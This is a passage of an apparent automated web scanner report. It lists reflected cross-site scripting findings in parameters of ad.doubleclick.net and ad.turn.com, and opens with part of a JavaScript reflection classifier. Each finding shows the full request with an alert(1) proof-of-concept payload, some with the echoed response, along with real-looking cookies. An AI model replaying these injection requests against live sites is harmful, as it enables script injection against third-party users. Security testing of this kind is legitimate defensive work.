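  fpid: {   // 1.43: inside a double-quoted iframe src attribute
    contentType: 'text/html;charset=UTF-8',
    payload: 'ab508"><script>alert(1)</script>f28986d6202',
    body: String.raw`<html><body>
<iframe name="turn_sync_frame" width="0" height="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&fpid=ab508"><script>alert(1)</script>f28986d6202&nu=n"
   scrolling="no"></iframe>
`,
  },
  fixed: {  // what a server that URL-encodes the value would return
    contentType: 'application/x-javascript',
    payload: '8be26"-alert(1)-"8859d5c8fb3',
    body: 'var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?ASID=d146d58be26%22-alert(1)-%228859d5c8fb3");\n',
  },
};

function classifySample(name) {
  const s = SAMPLES[name];
  return classifyReflection(s.body, s.payload, s.contentType);
}

for (const name of Object.keys(SAMPLES)) console.log(name, classifySample(name));
```

The `fixed` sample is the negative control a practitioner wants before closing a finding: once the server percent-encodes the value, the marker no longer appears verbatim and the classifier reports no reflection at all, rather than a reflection that merely fails to break out.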

1.33. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48f6a'-alert(1)-'dc0d0d0b99c was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM448f6a'-alert(1)-'dc0d0d0b99c&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:16 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM448f6a'-alert(1)-'dc0d0d0b99c&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83a9"-alert(1)-"0a5f61e11f5 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4e83a9"-alert(1)-"0a5f61e11f5&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:10 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4e83a9"-alert(1)-"0a5f61e11f5&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b412'-alert(1)-'da64d3f3254 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=212410659b412'-alert(1)-'da64d3f3254&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:56 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=212410659b412'-alert(1)-'da64d3f3254&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f178a"-alert(1)-"4c9e8c1a947 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065f178a"-alert(1)-"4c9e8c1a947&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:52 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
0x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065f178a"-alert(1)-"4c9e8c1a947&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3968c'-alert(1)-'1506c597196 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G3968c'-alert(1)-'1506c597196&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:47 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G3968c'-alert(1)-'1506c597196&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f338"-alert(1)-"a50b7643689 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G5f338"-alert(1)-"a50b7643689&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:43 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G5f338"-alert(1)-"a50b7643689&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8037'-alert(1)-'eebfd7f9b8f was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e8037'-alert(1)-'eebfd7f9b8f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5266
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 22 Mar 2011 21:12:49 GMT
Expires: Tue, 22 Mar 2011 21:12:49 GMT

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e8037'-alert(1)-'eebfd7f9b8fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx?
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7c4f"-alert(1)-"5711941fc4a was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e7c4f"-alert(1)-"5711941fc4a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5266
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 22 Mar 2011 21:12:42 GMT
Expires: Tue, 22 Mar 2011 21:12:42 GMT

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
= escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e7c4f"-alert(1)-"5711941fc4ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx?
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89d06"-alert(1)-"0e46aef3005 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that in the request below the sz=300x105 path segment is untouched; the payload sits after the ?! in the click0 URL, and the scanner's parameter label reflects its own parsing of the ad-tag URL. The reflection point is the same var url = escape("...") string as in 1.32.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!89d06"-alert(1)-"0e46aef3005&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:26 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
meyourprice_slider_flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!89d06"-alert(1)-"0e46aef3005&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e16a'-alert(1)-'93e31e9e62d was submitted in the sz parameter. This input was echoed unmodified in the application's response. As in 1.41, the sz=300x105 path segment in the request is untouched and the payload sits after the ?! in the click0 URL; the reflection point is the href=\"...\" inside the single-quoted document.write('...') argument, as in 1.33.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!8e16a'-alert(1)-'93e31e9e62d&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:30 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!8e16a'-alert(1)-'93e31e9e62d&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090
...[SNIP]...

1.43. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab508"><script>alert(1)</script>f28986d6202 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ab508"><script>alert(1)</script>f28986d6202 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QYdf8pQ322SIyBI2iUoAU4RjEWhnHVjNlGGMhSRuUKth-L3XcPmT4hHXOQgApIlYHYX4_NcWdx3_ane6F4B-14GhJc02ow2AtUwL6WPia2FGaLnf0zlcY_NlRLgfVWu_p2dXRupylG3NYnZS5bXKYP96WiAgIoOXEFUWrzhKF5gCw-urpRf-_9YebSTVOgNrqPihsYENeO8sXA9lvbRdayfMZtqW06LRo26dh_6mdAGJGTELtL4GqGulFNiuT83_JW8PFWxYJ1q2_24dlRk_ah5icQ-UlIA9kPFGJHuyqaq5VL3rxbStQ7qJq0UYbCEIsUtODQcKNwexAxOYVwN1nK5X96dOre3quYO9Z-8ufvZDTyl_SWg8JF85Vro55plfoTgVQZo2IE3aGhkEGjHTkTFiBYl1Y5wme5TkSr2cG_wgfqVSXeBNVe3tcWgG-cKlb6X9zJjlpwSm9YUJH9a4gJTCk-tuxUia_8m_xGP0ng-vamqLuW_YXqfv_SJ_aE8WewT_9aYmy1_kglD2-j2O9xEN2WSuwULQaF3F5bjuxzhmEuJsfxP5f1y2CMVwcPBKjitRrpYhjNWTpkhfFGNz1pMs9g0Q0vhgJiFRvR8WD6y1byxKhk0zupa7mhXtOt59TSvsYEqhZ0OHSuNp70BrBPgFZPUXsLmq7zd2bgatqFEtgpfxqN_T7QEW7hJnuqjPvjaUahkeh2AIOXYNj81E2z9CvciRuIEJCv8yxQ13OGBfB4P3wQx6U2WiVVEP-_Y7EOaV0vIfQZsAGrAD9lknuVDiL3nhapvU0GeEL2HT-L8OVgkB2bwToPK0KdNC16-jTfAO5O3oP_bfifepQZJrTx5icQ-UlIA9kPFGJHuyqarB6alCNElibRNjAQJxQ3wScEcZhGdHz3dGIuUYDCisolLji3VTL1tjXfqm-esg2sewf4n0X2poBn_JF16R7_JpoTgVQZo2IE3aGhkEGjHTkeeFQfumNuZsM8qSWC1YO88e0aAoBCNnU0MrQhAnhIPCOUygdo-nXLnZpGMXrI7z